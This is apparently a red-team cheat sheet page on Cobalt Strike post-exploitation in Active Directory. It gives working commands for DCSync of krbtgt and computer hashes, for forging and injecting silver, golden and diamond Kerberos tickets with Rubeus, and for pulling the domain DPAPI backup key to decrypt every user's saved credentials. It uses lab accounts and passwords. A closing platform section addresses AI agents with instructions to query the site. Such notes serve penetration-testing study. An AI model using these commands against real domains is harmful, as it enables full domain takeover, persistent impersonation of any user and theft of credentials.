> For the complete documentation index, see [llms.txt](https://book.ice-wzl.xyz/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://book.ice-wzl.xyz/c2-frameworks/cobalt-strike/dcsync-and-ticket-forgery.md). # DCSync and Ticket Forgery Techniques for after obtaining Domain Admin privileges. *** ## DCSync Requires Domain Admin, Enterprise Admin, or DC computer account. ``` # Impersonate DA make_token INLANEFREIGHT\bjohnson Passw0rd! # DCSync krbtgt hash dcsync inlanefreight.local INLANEFREIGHT\krbtgt # DCSync computer account (include $) dcsync inlanefreight.local INLANEFREIGHT\ilf-db-1$ ``` *** ## Ticket Forgery ### Silver Tickets Forged service ticket using service's secret. Targets specific service on specific machine. **Use case:** Maintain local admin access after initial compromise by forging CIFS tickets. ``` # Get computer account hash via dcsync first # Drop the RID from the SID C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe silver /service:cifs/ilf-db-1 /aes256: /user:Administrator /domain:INLANEFREIGHT.LOCAL /sid:S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX /nowrap ``` **Parameters:** * `/service` - Target service (e.g., cifs/hostname, MSSQLSvc/hostname:1433) * `/aes256` - AES256 hash of target computer/service account * `/user` - Username to impersonate * `/domain` - FQDN of domain * `/sid` - Domain SID (without RID) * `/id` - User RID (default: 500) * `/groups` - Group RIDs (default: 520,512,513,519,518) **Inject and use:** ``` make_token INLANEFREIGHT\Administrator FakePass execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe ptt /ticket: run klist ls \\ilf-db-1\c$ rev2self ``` **Silver ticket for MSSQL (after Kerberoasting):** ``` # Convert plaintext password to hash C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe hash /user:mssql_svc /domain:INLANEFREIGHT.LOCAL /password:Passw0rd! # Forge ticket impersonating sysadmin user C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe silver /service:MSSQLSvc/ilf-db-1.inlanefreight.local:1433 /rc4: /user:tmorgan /id:1108 /groups:513,1106,1107,4602 /domain:INLANEFREIGHT.LOCAL /sid:S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX /nowrap ``` > **Note:** Silver tickets can be mitigated by PAC validation. Ticket is signed with computer's secret instead of krbtgt, so KDC validation will fail. *** ### Golden Tickets Forged TGT signed with krbtgt secret. Can impersonate any user to any service. ``` C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe golden /aes256: /user:Administrator /domain:INLANEFREIGHT.LOCAL /sid:S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX /nowrap ``` **Parameters:** * `/aes256` - krbtgt AES256 hash * `/user` - Username to impersonate * `/domain` - Current domain * `/sid` - Current domain SID **Use golden ticket:** ``` make_token INLANEFREIGHT\Administrator FakePass execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe ptt /ticket: run klist ls \\ilf-dc-1\c$ ``` *** ### Diamond Tickets More OPSEC-safe than golden tickets. Requests legitimate TGT, decrypts it with krbtgt secret, modifies internals, re-encrypts and re-signs. ``` execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe diamond /tgtdeleg /krbkey: /ticketuser:Administrator /ticketuserid:500 /domain:INLANEFREIGHT.LOCAL /nowrap ``` **Parameters:** * `/tgtdeleg` - Uses TGT delegation trick (no creds needed) * `/krbkey` - krbtgt AES256 hash * `/ticketuser` - User to impersonate * `/ticketuserid` - Impersonated user's RID * `/domain` - Current domain * `/groups` - Group RIDs (default: 520,512,513,519,518) **Use diamond ticket:** ``` make_token INLANEFREIGHT\Administrator FakePass execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe ptt /ticket: run klist ls \\ilf-dc-1\c$ ``` *** ## DPAPI Backup Key Domain backup key can decrypt DPAPI blobs for **any user** in the domain. Never automatically changed. ### Extract Backup Key (Requires DA) ``` make_token INLANEFREIGHT\bjohnson Passw0rd! execute-assembly C:\Tools\SharpDPAPI\SharpDPAPI\bin\Release\SharpDPAPI.exe backupkey ``` **Output:** ``` [*] Preferred backupkey Guid : 12c95677-bb3d-4932-aab9-1e89c1dd005d [*] Key : HvG1s[...snip...]lXQns= ``` ### Decrypt Other Users' Credentials With local admin on a machine, decrypt any user's saved credentials: ``` # Enumerate credentials (will show MasterKey GUID not in cache) execute-assembly C:\Tools\SharpDPAPI\SharpDPAPI\bin\Release\SharpDPAPI.exe credentials # Decrypt using domain backup key execute-assembly C:\Tools\SharpDPAPI\SharpDPAPI\bin\Release\SharpDPAPI.exe credentials /pvk:HvG1s[...snip...]lXQns= ``` > **Note:** `/rpc` method only works for current user's credentials. Use `/pvk` with backup key for other users. *** ## Quick Reference - Ticket Types | Ticket Type | Secret Required | Scope | OPSEC | | ----------- | --------------------- | -------------- | -------------------------- | | Silver | Service/Computer hash | Single service | Medium | | Golden | krbtgt hash | Entire domain | Lower (forged offline) | | Diamond | krbtgt hash | Entire domain | Higher (modifies real TGT) | --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter: ``` GET https://book.ice-wzl.xyz/c2-frameworks/cobalt-strike/dcsync-and-ticket-forgery.md?ask=&goal= ``` `ask` is the immediate question: it should be specific, self-contained, and written in natural language. `goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.